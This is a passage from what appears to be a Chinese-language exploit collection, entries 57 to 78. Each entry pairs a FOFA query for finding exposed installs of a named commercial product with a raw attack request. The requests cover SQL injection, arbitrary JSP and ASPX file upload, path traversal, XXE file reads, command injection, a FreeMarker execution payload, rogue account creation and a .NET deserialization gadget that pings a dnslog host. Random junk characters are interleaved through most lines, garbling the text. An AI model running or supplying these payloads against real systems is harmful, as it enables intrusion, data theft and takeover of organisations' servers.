, G1 b: B( O! S! t& t "storeID":{- V: D) t6 g L4 Z4 f. x
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",. B) J. r9 q& N4 J6 f% G
"MethodName":"Start",) V3 X9 w8 H% D# N" k
"ObjectInstance":{
6 h1 V- O6 ^/ d "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- ~3 a) F1 Z. c7 f5 W/ A "StartInfo": {
1 E2 N* P- e$ {; y J* i+ k! A "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 x, k( e/ J1 P "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
9 r( M* {# ]' Z4 H& f+ C5 O, o }
! D$ L. Q Z! ^. q" j& I* O }
7 I6 E, d/ `) A& L0 B }
0 t' g( t! C6 ~; G) T}5 B" F/ A9 Q9 }9 s# o# V
, `/ c3 w, ? l+ Y) N% B
+ v' F( v! h, w* `4 ^ S7 \57. 畅捷通T+ keyEdit.aspx SQL注入
+ G3 m# ?& ?' C6 U; E3 T- @FOFA:app="畅捷通-TPlus"- F" b2 v1 z, }- D& {- d5 X
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
4 n- {2 u( `$ a* {Host: host/ @" k, g( I9 X6 K9 ]& n; Z: b
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! k+ S. q. M- I( o* h; d
Accept-Charset: utf-88 ~$ ?5 `1 b$ a, E; C% a
Accept-Encoding: gzip, deflate7 {/ Y: l9 K2 K. F
Connection: close
" G5 x7 s" I7 f( t# S
/ n8 o' w2 U% R4 V# i
1 t$ [" H6 R! G: q; m# h0 I1 i/ V58. 畅捷通T+ KeyInfoList.aspx sql注入
, w' l( F/ Z3 M& P. y7 WFOFA:app="畅捷通-TPlus"& q& ?1 Z6 T4 Y8 S
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1* U0 ^8 |6 F' l
Host: your-ip
" i! ?9 ?. Q7 T. T- u3 FUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 r5 \8 l, B- @8 k% R' d) M0 f- }
Accept-Charset: utf-8
+ X! Y8 E& ~- sAccept-Encoding: gzip, deflate- p% B( _8 C1 v9 z; F- r, ]
Connection: close1 l) q v) m; |& i {5 s- X Q" @
- a% M V. f% J
( z) V* r: t# m: f" i
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
5 z! ~2 W( g( R( ` b w, ~; dFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
& n2 T1 ~, w+ b3 c1 s! e7 p; kPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
2 L2 \2 R) B5 s# F* bHost: 192.168.86.128:9090
. p9 V( x; F2 o; o, d; ]User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.363 W+ d' B" V/ j3 m; Y; d' ? b
Connection: close/ p6 m( E$ a; B4 u% k0 C
Content-Length: 1669
- V8 s h; I/ a# M( U: [' \2 x8 ZAccept: */*
$ l/ j' y6 J% N' K1 PAccept-Language: en
, e* g E- a! @6 L7 YContent-Type: application/x-www-form-urlencoded9 \4 w# C6 w- n- o' E* q
Accept-Encoding: gzip
$ i/ W7 F: E% i) h: e( t$ u
; A5 l; U7 n! p h/ t& \PAYLOAD' c' z0 a/ h: `
8 H/ n w8 q" _4 n/ {& b& Q/ G- F! b; _5 w8 N( H. ?& s V
60. 百卓Smart管理平台 importexport.php SQL注入
+ s% Q. J- S) t6 \- ~0 UFOFA:title="Smart管理平台"! t9 r, m @/ p+ \% @
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1( M g3 X* q8 q0 _% M' t
Host:
$ G! j' d6 y5 M5 A Z; D; \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
e/ I- E" [+ D# u: i, i. r! Z H$ uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* ]3 ?+ F/ \; O1 v* d# |Accept-Encoding: gzip, deflate
0 j; y2 }- Y" }) i Q2 G5 E9 K LAccept-Language: zh-CN,zh;q=0.9& D t2 G. R+ m* X+ H
Connection: close
0 h/ o$ y* c* }3 R" c" Z$ R2 b& B, T {( b' X$ g
3 f2 p$ z" o% I6 ?3 a1 _61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ m0 d8 F9 k/ @1 \# Z8 ?# Y
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
0 o; [7 R% V+ i# D" lPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.14 x2 ~% b4 `8 W; A- N6 L
Host: x.x.x.x
; L( T2 e) I% V' E. J. iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ _: Y- g5 u! B( q3 | s8 QConnection: close9 p: O+ j# F: {
Content-Length: 27
3 k# a7 I$ R9 i$ h; Y9 ~: QAccept: */*$ T: V- g ]( y$ j4 n+ |; `
Accept-Encoding: gzip, deflate
% ]+ e% |# }/ P$ @ E" qAccept-Language: en
* ^$ X: P3 a D% ^8 wContent-Type: application/x-www-form-urlencoded1 K6 V( F0 V/ j$ l
5 R$ {* _9 e) b8uxssX66eqrqtKObcVa0kid98xa8 W3 A+ C! S1 ^/ F" f
. z% a4 g+ f% F7 t. F, s7 U' ?$ m( H! k a/ j7 \
62. IP-guard WebServer 远程命令执行
" @7 Z' p: w# |2 N6 F( ?5 ZFOFA:"IP-guard" && icon_hash="2030860561"
; t# R0 ^- F% V7 CGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.19 i. A) k+ x9 G# D, W3 Z7 {9 J
Host: x.x.x.x/ `% r4 h1 F( a
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36& p, F& I0 w0 V4 C8 M3 X/ H3 Y2 U
Connection: close
" z4 _" y4 F o, }+ GAccept: */*3 ^+ C5 \" P- ^! H M, Z
Accept-Language: en4 V* o5 K6 N: U7 b- S: e: ^4 X
Accept-Encoding: gzip
6 W% F* {! a1 R6 n5 W
5 Q7 t* J5 O1 F
! c% H( n0 p& M4 ?! @访问: \: h5 Z; G) V/ E8 Y7 B c
: O2 S K G" K8 d# AGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.13 ~( g; L* K* c2 n+ R$ Z$ p
Host: x.x.x.x9 O1 W2 `( s4 S" L
8 }2 q Z# t5 @ l6 v4 v( A5 r5 _9 G- W5 E0 l/ Q. |! J4 T- ?
63. IP-guard WebServer任意文件读取
0 y/ u* c% z# G8 f3 iIP-guard < 4.82.0609.0: d' N3 O6 M( p2 O/ f# I
FOFA:icon_hash="2030860561"
1 M& m1 @0 w; Z2 t+ E+ NPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1# y9 o) K0 h0 ~/ y+ k8 b$ y% D7 h% Y t
Host: your-ip$ E8 n: K4 a4 q% {" K: J! x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.365 i) P( Z5 @0 e( `. N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- J1 v2 \$ y+ f
Accept-Encoding: gzip, deflate
) ^- Y+ E" G, O: m: h% P- oAccept-Language: zh-CN,zh;q=0.93 v6 _$ I- j: L- k. k- H
Connection: close
8 U2 h) x' M `- ^' W1 {1 f2 eContent-Type: application/x-www-form-urlencoded6 B7 G# c9 l: z. ^) [# N' J
( F- H0 g' C" v! d" \) i/ c8 rpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
" Z, r9 s, e2 k4 a9 a, ~* E; ]$ q. `8 D. l3 m: K
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
4 M; Q- Z. l6 k$ l0 wFOFA:body="/Scripts/EnjoyMsg.js"
$ ]3 a9 j5 W5 N) @$ o1 e) ]# CPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
- ^. b1 E$ F3 [+ c8 ], T/ W+ j8 m- IHost: 192.168.86.128:9001
$ t3 F' i" `( z8 F) ~User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36, O7 F: i# Y- _3 N: h7 O) I1 ]" U
Connection: close/ q; n& ~; o/ F$ x& L6 q; i
Content-Length: 369
( B) N! x( b3 o) P7 cAccept: */*
/ x9 L! l, L% C, _% nAccept-Language: en
& m8 ]4 Z6 s j7 `! y0 R, k# oContent-Type: text/xml; charset=utf-8
5 [; ^* k/ E" dAccept-Encoding: gzip
& d6 T& L) j2 A' O% F' `1 u5 L
D) p1 k/ N9 d5 h2 \% [) V<?xml version="1.0" encoding="utf-8"?>
+ ~, S0 x: h( F9 w! _<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">+ u3 V5 q0 X1 K* P: @2 h6 q, v* Y5 @
<soap:Body>
; I- C) H d& v9 l <GetOSpById xmlns="http://tempuri.org/">
2 ^" z/ b7 [3 Q3 E" h8 k <sId>1';waitfor delay '0:0:5'--+</sId>1 F# S3 D% v, ]7 g7 S9 p, l& K
</GetOSpById>3 ]8 q n8 x8 N+ ^0 n5 s! b
</soap:Body>& b9 C. ]9 t6 L* Q$ A
</soap:Envelope>; I. a5 e$ n- m" f8 \ i2 f
# F& E O" A! B1 F& T5 \# J' o
) J' ?* e4 U1 s+ w2 W! A65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
5 `9 @& u/ b! yFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"" o1 ^, P1 Z7 y7 X# k! b
响应200即成功创建账号test123456/123456
* Y: @& f1 w* @POST /SystemMng.ashx HTTP/1.17 @& A" u+ T( ^0 E
Host:
0 S: M3 P+ {3 n5 G- c* J) @User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Q& ^8 u% W/ n1 W: [3 A
Accept-Encoding: gzip, deflate0 l9 U L: O6 O/ X( h; ~
Accept: */*, \; X$ D4 K k7 v9 n' ~" o6 o
Connection: close1 V9 m& ^5 p$ E* T" c
Accept-Language: en
, o5 p7 h0 U# Y8 S# S8 DContent-Length: 1740 K* x, r: A0 f w* F6 S
; u% \! U5 [3 l4 {5 C6 p, x& N/ xoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
6 O" \+ c0 P; V' }) R M' n1 ?! @& g$ d7 R& W6 _
+ m f+ r8 s: s/ o q
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
8 }7 N+ g0 b9 ~& u; l& b+ ~FOFA:app="万户ezOFFICE协同管理平台"
! X5 i+ o6 u' U( |. B# C6 x+ l) |+ M1 V9 r; i
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
- y- N& ?5 f5 \+ _, S3 {# t$ KHost: x.x.x.x9 H/ ~ z9 ^. s8 Z6 G* a0 |0 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) |# y8 h5 i5 L5 I" _4 XConnection: close! f9 k1 g; D8 L- ~: z, A
Accept: */*! }2 Y$ r4 w3 y" [ i& V# b; C
Accept-Language: en/ Q7 S: w/ o b
Accept-Encoding: gzip
$ z5 _ W+ n" A* o6 @1 \$ o1 w' \% [5 d7 ^
t8 |5 X* K1 y& r, w1 r6 \( v
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
& r/ n3 @- o) w' v* o+ F3 o6 i1 C: x
: [& z; ~" S* B7 O) A- p* \/ \0 a, ?67. 万户ezOFFICE wpsservlet任意文件上传7 O* m! f& _& @6 N+ k& B
FOFA:app="万户网络-ezOFFICE"% s& E& U9 V7 S6 e' f: \
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型* N0 u N5 N& o$ A* |
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
8 O( J8 {2 c& x& o/ F5 LHost: x.x.x.x; q8 d. I5 i1 Y/ J9 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
: z' ]1 |( {" v3 i7 LContent-Length: 173& J# j5 b- x6 J8 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# P8 E% d; }6 k0 WAccept-Encoding: gzip, deflate3 f1 M7 w5 z* G {4 Z0 T6 c& g
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
9 V2 V; \ n4 B1 dConnection: close
+ a' u ? C9 l' \5 c' @Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
" ^/ O2 u* o2 @* P( sDNT: 1
2 _# q0 T5 ]# KUpgrade-Insecure-Requests: 1( ^& l4 O8 J6 G+ k, b, T( F; ~: d& a
( j% @% M8 M0 A8 b1 F--ufuadpxathqvxfqnuyuqaozvseiueerp
8 x1 G% d, P. Q1 N* O; o' s5 b. k) ~6 OContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"* C% G: r; a Z9 n. y
9 k8 f& I3 h' U3 Q- z0 V. V) |<% out.print("sasdfghjkj");%>$ D) x; L0 G; a: E' M. B* Z _
--ufuadpxathqvxfqnuyuqaozvseiueerp--0 }5 I* x$ R7 n0 i* i
6 @, d) d* F8 x) H9 \8 F# k3 p+ x! N' p8 s
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp$ A6 `% i9 J6 n& \
& U* C E) F8 f1 |7 B7 X68. 万户ezOFFICE wf_printnum.jsp SQL注入+ ^* Q3 w9 {; m0 N8 D
FOFA:app="万户ezOFFICE协同管理平台"
5 _% T; Y" U. a3 zGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.14 i4 }* ?8 N$ n* ]( a, g# B7 M& \
Host: {{host}}
6 x" e) C, p. {2 A* P$ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
4 R5 j% \4 p; K3 fAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* ]* P# h5 Y% W! `
Accept-Encoding: gzip, deflate
7 Q. o" [7 [) {" LAccept-Language: zh-CN,zh;q=0.9
# R- X& w7 \. Q1 V+ A. l8 bConnection: close
0 S, X5 s. w* V' J5 t- z$ x+ T; ]& v- P& u; V/ z* e- g# S
$ H" W: U' m; j( C5 j1 j. M69. 万户 ezOFFICE contract_gd.jsp SQL注入. l9 P/ Q8 `$ y/ w
FOFA:app="万户ezOFFICE协同管理平台"
1 V; V2 d- u, |8 [8 U0 X: QGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1# c: W# ?# r- x3 G$ a$ Z* a' J; J
Host: your-ip: T, d" V4 f1 `9 M$ ^; C- N7 k
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ v/ w+ D+ r7 j, U; i! @9 Z1 QAccept-Encoding: gzip, deflate3 n+ z# `+ K* {+ Q3 q
Accept: */* P/ v9 Z7 I' b$ _+ x( m
Connection: keep-alive
; S" J$ R8 [# b; f# }) P/ g# }4 H% e" m& W+ p
5 A9 F6 ~& D" v7 ]- I: o% b! o0 B
70. 万户ezEIP success 命令执行
6 `5 t9 _2 W4 X3 e$ b/ wFOFA:app="万户网络-ezEIP"
q$ S m" @* M! |POST /member/success.aspx HTTP/1.1
- ~* _2 P( ?! w" ?Host: {{Hostname}}
+ V# Z# Z9 V+ f6 B6 z8 i& MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" p7 l( \, t& t, n! p* z& U; D2 i5 `
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=7 |3 ?5 f" U( F' N0 k# @) o2 J `
Content-Type: application/x-www-form-urlencoded% h: L4 H2 t6 i8 I
TYPE: C
( D2 M$ V6 m2 AContent-Length: 16702( P9 z& {0 O+ i- t" D( Q
6 h2 O3 }. {. I: C0 V& z I- w__VIEWSTATE=PAYLOAD6 D, W- G: s" p+ `4 |6 Q/ _) [
2 I! s; u! J, d; N; a3 S6 }
3 e4 L" L5 R: R; P71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入( _" J' m# O+ h8 E# C2 y7 v
FOFA:body="PM2项目管理系统BS版增强工具.zip"% W, H9 h- ]3 \) d" X, b
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
8 Y4 U; |$ V% p' C7 d6 x5 f. WHost: x.x.x.xx.x.x.x
; ?, v) N! Z2 r0 j4 h' DUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' | ^- H0 V+ u) @' Y' V6 |
Connection: close1 q! C( Z0 z! c4 l8 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; q! l: b2 n7 C zAccept-Encoding: gzip, deflate2 V) M, \+ ^9 S% q+ T: E) q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) R$ L* f3 w4 i2 O# FUpgrade-Insecure-Requests: 10 P! N3 U2 J; _) D$ k7 m1 B5 u2 {
# l& P$ c9 n( I
. p" a$ R1 V- n, j7 @3 S9 v72. 致远OA getAjaxDataServlet XXE, h+ F5 f2 c* _0 g
FOFA:app="致远互联-OA"
8 g7 h) a. I7 l; s8 L' UPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1/ T! o! ~, }! ?! K
Host: 192.168.40.131:8099! t* a) q6 n$ E" g- W% M ^
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.364 e. m! s! E0 d4 L+ h0 ?2 K
Connection: close
- [+ ~3 ]6 B8 U3 C* i+ VContent-Length: 583
% y$ y4 l9 X6 IContent-Type: application/x-www-form-urlencoded
+ g ~* W* j; ^5 F) h/ a" Y. h. C) ZAccept-Encoding: gzip& N( c, ?& c* Y- D5 q: P4 s
9 {( K2 o1 H* ?' \: m y/ K, |- n( ^
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
+ S, @/ t8 S+ u7 j
! v0 V2 a/ j8 O6 V1 Q3 }9 i" D( m3 D& M9 W
73. GeoServer wms远程代码执行* b; F! w9 ^: L& A! B
FOFA:icon_hash=”97540678”
" w8 z( n2 D+ d% E# RPOST /geoserver/wms HTTP/1.1
! q, p6 U+ z2 I5 W1 oHost:
1 B$ j; Z, U M5 F! v1 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 T& c6 D9 U$ P r- k( h$ Z7 KContent-Length: 1981
/ ?* A/ }, o; d- X% A9 [Accept-Encoding: gzip, deflate
, C0 @. i2 U- _% HConnection: close
9 A$ {% K, m2 fContent-Type: application/xml
! J' B o+ x+ S9 V I3 M! f; oSL-CE-SUID: 3
/ k* A" w1 ^0 O4 r, v" |: k
4 G1 r/ i& R6 f3 x% RPAYLOAD) w6 h3 n) O' S- U* E% D( }- B# M
% m; A; S1 Z# ~: M8 J5 ~( e1 k4 p
9 v# a' f4 ~$ b: O, I8 z Z7 |74. 致远M3-server 6_1sp1 反序列化RCE* h+ W' B# e% Q" n" o8 u, X9 t, l
FOFA:title="M3-Server"1 ^+ j8 V5 A; b
PAYLOAD3 g6 D/ n) O( B% |* u
& [/ W5 f& [! o3 M; p, _/ d1 ^& D
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
0 b" ~5 e5 O2 X8 j8 SFOFA:app="TELESQUARE-TLR-2005KSH"
( `( d2 W& P7 k) @- j; |' x) RGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
* l8 k7 m \; A( k/ U: r; FHost: x.x.x.x
6 j3 e/ o- ?/ [& PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ b; H5 i F: R' d. Q
Connection: close/ o; _, m! _* ~- h$ e. t9 G
Accept: */*
. V, ~+ k, {3 E3 U4 b) JAccept-Language: en4 k) y) z% W; I3 a% v- x1 s R, `
Accept-Encoding: gzip6 A0 g8 ]( {' W7 F$ ?) R! F9 X. ?8 @
# Q2 I$ i+ Y4 S4 \( r" ?5 i' s# \1 B' E. f. x
GET /cgi-bin/test28256.txt HTTP/1.1: w0 y5 h `# M4 B @
Host: x.x.x.x# e7 I2 ?* b* @& x1 w3 ~. t
9 \0 s& j+ n2 M. s& U& T) R3 V. P) W- V3 M2 _3 n" Z# k+ @
76. 新开普掌上校园服务管理平台service.action远程命令执行
; N' w g6 Z! S+ ^2 f2 ^FOFA:title="掌上校园服务管理平台"
; ], p N0 ]+ h, t4 S$ v) hPOST /service_transport/service.action HTTP/1.1* D' ~. I) R# R8 t7 k
Host: x.x.x.x) _6 E0 _ j/ O! {& n5 ^ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, r4 i$ D6 Z5 V9 ~
Connection: close
" {* m# J( Y% h' u; H5 \: ^Content-Length: 211
2 x. }1 y1 D6 S# c8 [7 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ }! z: U- ~/ y; w0 j8 z9 Q" sAccept-Encoding: gzip, deflate
3 F3 ~" i# f8 Z9 u% f- VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; H2 `! [% @9 f- z6 s( A$ I
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
5 H$ k. q* I: @Upgrade-Insecure-Requests: 1
0 j- k* j b8 c# B( f1 b& P$ F
7 l% c* ~$ a/ _; q: I- z{- a- c U# o, h' @# J1 v
"command": "GetFZinfo",
" U0 l% M( G! ^* ], w$ D "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
3 ~$ C; t9 S& H' F. N' p9 @9 M ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}", I' Z4 v* s1 c3 h; ^" K! |0 E
}: Y: b# P3 m+ j( ?4 W5 W
! }9 L2 S- o2 g+ Y- _/ V# x
. ^" O3 H0 O7 B) K) r3 @% X+ P* l2 R
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
; X0 J; ^% f5 ?6 jHost: x.x.x.x
, G: Q9 Q3 X; y$ F9 s/ W% n6 R
0 |; F2 |: Y( N8 ]7 _1 ?+ o1 T
u) v: q% ^* Q7 b% H- C( V, o& ]' ?! R, ^
77. F22服装管理软件系统UploadHandler.ashx任意文件上传; h2 Z7 F7 X# ~# }" \5 X# R
FOFA:body="F22WEB登陆"
9 N1 ^/ Q) F$ j& UPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.19 Q. k9 m9 d- Z% z. E+ S8 X
Host: x.x.x.x
; D2 }; ^1 k; t' d {2 R; O$ Y- RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. U( f6 g0 U+ s9 m5 F" e: P8 A+ P$ T
Connection: close/ ]! J+ r6 m! s- W O5 [
Content-Length: 433- j2 I! I3 i r/ g/ V, u! Y
Accept: */*2 J# V5 J" J! N+ q( Z
Accept-Encoding: gzip, deflate9 o' h0 \$ q% w2 _5 C& _) d: J2 k
Accept-Language: zh-CN,zh;q=0.9) j% Q7 H, _6 @2 s+ F p. D/ p
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
- ~* y4 w& a" X4 P( O9 W1 v, o& u$ T: x! [, d+ D# t- Q( z
------------398jnjVTTlDVXHlE7yYnfwBoix
4 _5 [( d: C' `, b" ^8 b1 \Content-Disposition: form-data; name="folder"' X: }& W9 K h j. j" i
# i9 l9 q2 f6 a1 p. W4 U/upload/udplog$ q6 d+ Z; s* C# \; [, D3 h
------------398jnjVTTlDVXHlE7yYnfwBoix' h5 P: c7 T" a
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"3 v. I9 ^. x' ~4 y' D" w: ~' _
Content-Type: application/octet-stream* J! H6 V# f9 T1 d3 h
6 x+ n6 t0 u! c9 L( e
hello1234567
, c4 _" s# e5 x& i$ w! ~3 q------------398jnjVTTlDVXHlE7yYnfwBoix1 I/ v6 x! o }- \
Content-Disposition: form-data; name="Upload"
4 h* A7 T# q& N, T) j- R) G) H" G5 \: K2 z6 C: h; g; Z0 m- e( b
Submit Query
9 a7 U% i, }( O1 O& f) ]8 T------------398jnjVTTlDVXHlE7yYnfwBoix--
5 l8 [2 h; Q2 y6 B5 A
: }! y/ A$ F7 v' G- E' M7 W
' x( n1 e" n) t78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传 t5 c& I% I+ @% ?3 R8 a
FOFA:icon_hash="2001627082"
' z7 p2 O# |) e8 o: u3 e9 l* nPOST /Platform/System/FileUpload.ashx HTTP/1.1/ G/ {. A6 U- a$ H; W# _
Host: x.x.x.x
( t3 U3 ~' [+ l* mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; P0 j1 x. r# _2 z
Connection: close
% v* `) l+ s9 xContent-Length: 336. U9 P( _9 T: B, o; f- d% W
Accept-Encoding: gzip
, q) I7 O; [, g& y# {, G3 Y: {, n: ^Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l. { k5 @0 @) b. g/ D
: ~- } _/ n7 J7 W------YsOxWxSvj1KyZow1PTsh98fdu6l
) O' R* d" q; p0 F% ^* T- P2 f2 d9 pContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
7 B0 m! q2 k) ~7 xContent-Type: image/png0 B4 P7 a8 Q- C6 t# [2 ]
+ B8 h. l# P' C+ N) n; }$ q1 Y
